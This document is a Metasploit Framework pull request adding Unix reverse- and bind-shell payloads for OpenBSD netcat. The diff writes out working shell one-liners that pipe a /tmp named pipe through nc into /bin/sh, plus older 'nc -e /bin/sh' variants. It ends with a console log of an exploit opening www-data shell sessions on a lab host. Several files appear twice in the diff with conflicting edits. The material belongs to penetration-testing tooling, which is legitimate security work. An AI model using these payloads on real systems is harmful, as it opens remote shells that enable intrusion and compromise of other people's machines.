### PR TITLE
Added cmd payloads for netcat openbsd version

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -253,7 +253,7 @@ class Exploit
 			'cmd/unix/interact',
 			'cmd/unix/reverse',
 			'cmd/unix/reverse_perl',
-			'cmd/unix/reverse_netcat',
+			'cmd/unix/reverse_netcat_gaping',
 			'windows/meterpreter/reverse_nonx_tcp',
 			'windows/meterpreter/reverse_ord_tcp',
 			'windows/shell/reverse_tcp',

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb
@@ -10,28 +10,23 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit4
+module Metasploit3
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'         =>
-				[
-					'm-1-k-3',
-					'egypt',
-					'juan vazquez'
-				],
+			'Author'        => 'hdm',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::BindTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat',
+			'RequiredCmd'   => 'netcat-e',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -51,8 +46,7 @@ module Metasploit4
 	# Returns the command string to use for execution
 	#
 	def command_string
-		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+		"nc -lp #{datastore['LPORT']} -e /bin/sh"
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb
@@ -10,28 +10,23 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit4
+module Metasploit3
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e) IPv6',
 			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'         =>
-				[
-					'm-1-k-3',
-					'egypt',
-					'juan vazquez'
-				],
+			'Author'        => 'hdm',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::BindTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat',
+			'RequiredCmd'   => 'netcat-e',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -51,8 +46,7 @@ module Metasploit4
 	# Returns the command string to use for execution
 	#
 	def command_string
-		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+		"nc -6 -lp #{datastore['LPORT']} -e /bin/sh"
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/bind_netcat_openbsd.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_openbsd.rb
@@ -1,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
+			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/bind_netcat_openbsd.rb
+++ b/modules/payloads/singles/cmd/unix/bind_netcat_openbsd.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -10,23 +10,28 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
 			'Description'   => 'Creates an interactive shell via netcat',
-			'Author'        => 'hdm',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
 			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat-e',
+			'RequiredCmd'   => 'netcat',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -46,7 +51,8 @@ module Metasploit3
 	# Returns the command string to use for execution
 	#
 	def command_string
-		"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -6,32 +6,27 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/bind_tcp'
+require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit4
+module Metasploit3
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions
 
 	def initialize(info = {})
 		super(merge_info(info,
-			'Name'          => 'Unix Command Shell, Bind TCP (via netcat)',
-			'Description'   => 'Listen for a connection and spawn a command shell via netcat',
-			'Author'         =>
-				[
-					'm-1-k-3',
-					'egypt',
-					'juan vazquez'
-				],
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat -e)',
+			'Description'   => 'Creates an interactive shell via netcat',
+			'Author'        => 'hdm',
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'unix',
 			'Arch'          => ARCH_CMD,
-			'Handler'       => Msf::Handler::BindTcp,
+			'Handler'       => Msf::Handler::ReverseTcp,
 			'Session'       => Msf::Sessions::CommandShell,
 			'PayloadType'   => 'cmd',
-			'RequiredCmd'   => 'netcat',
+			'RequiredCmd'   => 'netcat-e',
 			'Payload'       =>
 				{
 					'Offsets' => { },
@@ -51,8 +46,7 @@ module Metasploit4
 	# Returns the command string to use for execution
 	#
 	def command_string
-		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-		"mknod /tmp/#{backpipe} p; (nc -l -p #{datastore['LPORT']} ||nc -l #{datastore['LPORT']})0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
+		"nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
 	end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_openbsd.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_openbsd.rb
@@ -1,0 +1,58 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via netcat)',
+			'Description'   => 'Creates an interactive shell via netcat',
+			'Author'         =>
+				[
+					'm-1-k-3',
+					'egypt',
+					'juan vazquez'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'netcat',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
+		"mknod /tmp/#{backpipe} p; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+	end
+
+end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_openbsd.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_openbsd.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
-module Metasploit3
+module Metasploit4
 
 	include Msf::Payload::Single
 	include Msf::Sessions::CommandShellOptions


### PR DESCRIPTION
Related to #1496 

This pull requests add cmd payloads for openbsd versions of netcat, where the "-e" option isn't available. Idea discussed with @jlee-r7 

It has been tested successfully with #1496 by @m-1-k-3 and by me with the php_charts_exec exploit (Ubuntu 10.03, netcat_openbsd) :

```
msf  exploit(php_charts_exec) > set payload cmd/unix/reverse_netcat_openbsd 
payload => cmd/unix/reverse_netcat_openbsd
msf  exploit(php_charts_exec) > set rhost 192.168.1.159
rhost => 192.168.1.159
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[-] Exploit failed: The following options failed to validate: LHOST.
msf  exploit(php_charts_exec) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.159:80 - Sending payload (572 bytes)
[*] Command shell session 1 opened (192.168.1.128:4444 -> 192.168.1.159:48107) at 2013-03-05 12:43:01 +0100
id
[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.1.159 - Command shell session 1 closed.  Reason: User exit
msf  exploit(php_charts_exec) > set payload cmd/unix/bind_netcat_openbsd 
payload => cmd/unix/bind_netcat_openbsd
msf  exploit(php_charts_exec) > rexploit
[*] Reloading module...

[*] 192.168.1.159:80 - Sending payload (620 bytes)
[*] Started bind handler
[*] Command shell session 2 opened (192.168.1.128:57699 -> 192.168.1.159:4444) at 2013-03-05 12:44:02 +0100
id
[-] Exploit failed [unexpected-reply]: 192.168.1.159:80 - Sending payload failed

uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 2? [y/N]  y

[*] 192.168.1.159 - Command shell session 2 closed.  Reason: User exit
msf  exploit(php_charts_exec) > 
```
